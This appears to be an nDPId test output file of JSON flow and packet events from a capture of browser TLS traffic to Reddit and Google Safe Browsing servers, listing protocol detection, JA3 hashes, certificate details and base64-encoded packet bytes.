-01269{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":27,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1605291684452,"flow_last_seen":1605291684551,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":457,"midstream":0,"thread_ts_msec":1605291684551,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","server_names":"reddit.com,*.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.reddit.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"DB:E9:D5:FE:EB:EF:68:34:55:FD:62:BA:C9:BB:04:D4:E3:22:18:81"}} -01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"reddit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291684451,"flow_last_seen":1605291684551,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291684551,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40030,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"safebrowsing.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00944{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291684481,"flow_last_seen":1605291684552,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291684552,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01000{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":56,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291684481,"flow_last_seen":1605291684592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291684592,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01270{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291684481,"flow_last_seen":1605291684593,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291684593,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","server_names":"reddit.com,*.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.reddit.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"DB:E9:D5:FE:EB:EF:68:34:55:FD:62:BA:C9:BB:04:D4:E3:22:18:81"}} -00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":279,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686035,"flow_last_seen":1605291686035,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686035,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56562,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":279,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1605291686035,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686035,"pkt":"qtsDr8lk5EKm5WPyht1gDzZzACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PIBu+DxzH8AAAAAoAL9INmFAAACBAWgBAIICql05ecAAAAAAQMDBw=="} -00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":280,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686035,"flow_last_seen":1605291686035,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686035,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":280,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1605291686035,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686035,"pkt":"qtsDr8lk5EKm5WPyht1gCjLcACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PQBu\/EwLy4AAAAAoAL9IGaWAAACBAWgBAIICql05ecAAAAAAQMDBw=="} -00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":281,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686035,"flow_last_seen":1605291686035,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686035,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56566,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":281,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1605291686035,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686035,"pkt":"qtsDr8lk5EKm5WPyht1gAChDACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PYBu+yXuQoAAAAAoAL9IOFQAAACBAWgBAIICql05ecAAAAAAQMDBw=="} -00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":282,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686035,"flow_last_seen":1605291686035,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686035,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56568,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1605291686035,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686035,"pkt":"qtsDr8lk5EKm5WPyht1gCVbzACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PgBu3BHTUsAAAAAoAL9IMleAAACBAWgBAIICql05ecAAAAAAQMDBw=="} -00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":283,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686035,"flow_last_seen":1605291686035,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686035,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56570,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":283,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1605291686035,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686035,"pkt":"qtsDr8lk5EKm5WPyht1gB\/ybACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PoBu\/q4YysAAAAAoAL9ICkLAAACBAWgBAIICql05ecAAAAAAQMDBw=="} -00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":284,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686035,"flow_last_seen":1605291686035,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686035,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56572,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1605291686035,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686035,"pkt":"qtsDr8lk5EKm5WPyht1gAreKACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PwBu8WSVasAAAAAoAL9IGuvAAACBAWgBAIICql05ecAAAAAAQMDBw=="} -00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":417,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686060,"flow_last_seen":1605291686060,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686060,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56574,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":417,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1605291686060,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686060,"pkt":"qtsDr8lk5EKm5WPyht1gBKPwACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3P4Bu+9x1NYAAAAAoAL9IMKJAAACBAWgBAIICql05gAAAAAAAQMDBw=="} -00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":418,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686060,"flow_last_seen":1605291686060,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686060,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56576,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":418,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1605291686060,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686060,"pkt":"qtsDr8lk5EKm5WPyht1gDoxGACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QABu3ytfXMAAAAAoAL9IIyvAAACBAWgBAIICql05gAAAAAAAQMDBw=="} -00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":419,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686060,"flow_last_seen":1605291686060,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686060,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1605291686060,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686060,"pkt":"qtsDr8lk5EKm5WPyht1gBLbYACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QIBuwaOmx4AAAAAoAL9IOUhAAACBAWgBAIICql05gAAAAAAAQMDBw=="} -00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":420,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686060,"flow_last_seen":1605291686060,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686060,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":420,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1605291686060,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686060,"pkt":"qtsDr8lk5EKm5WPyht1gCVnRACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QQBuwBg34wAAAAAoAL9IKbfAAACBAWgBAIICql05gAAAAAAAQMDBw=="} -00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":421,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686064,"flow_last_seen":1605291686064,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686064,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":421,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1605291686064,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686064,"pkt":"qtsDr8lk5EKm5WPyht1gBAJCACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QYBu4l3q2EAAAAAoAL9IFHtAAACBAWgBAIICql05gQAAAAAAQMDBw=="} -00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":422,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686064,"flow_last_seen":1605291686064,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686064,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56584,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1605291686064,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686064,"pkt":"qtsDr8lk5EKm5WPyht1gAj4aACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QgBuwHFZiEAAAAAoAL9IB7eAAACBAWgBAIICql05gQAAAAAAQMDBw=="} -00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":423,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686064,"flow_last_seen":1605291686064,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686064,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56586,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":423,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1605291686064,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686064,"pkt":"qtsDr8lk5EKm5WPyht1gCQMdACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QoBuxlyLXsAAAAAoAL9ID\/VAAACBAWgBAIICql05gQAAAAAAQMDBw=="} -00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":424,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686064,"flow_last_seen":1605291686064,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686064,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1605291686064,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686064,"pkt":"qtsDr8lk5EKm5WPyht1gBZ0wACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QwBu2zjowUAAAAAoAL9IHbXAAACBAWgBAIICql05gQAAAAAAQMDBw=="} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1605291686065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686065,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc9JWtCtDxMC8voBJXgHBaAAACBAV4AQMDAwQCCArC1ziiqXTl5w=="} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1605291686065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686065,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc8oSMMqHg8cyAoBJXgMyZAAACBAV4AQMDAwQCCArC1ziiqXTl5w=="} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":427,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1605291686065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686065,"pkt":"qtsDr8lk5EKm5WPyht1gCjLcACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PQBu\/EwLy+VrQrRgBAB+\/RNAAABAQgKqXTmBcLXOKI="} -00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":428,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1605291686065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686065,"pkt":"qtsDr8lk5EKm5WPyht1gDzZzACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PIBu+DxzICEjDKigBAB+1CNAAABAQgKqXTmBcLXOKI="} -00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":429,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686065,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":430,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686065,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 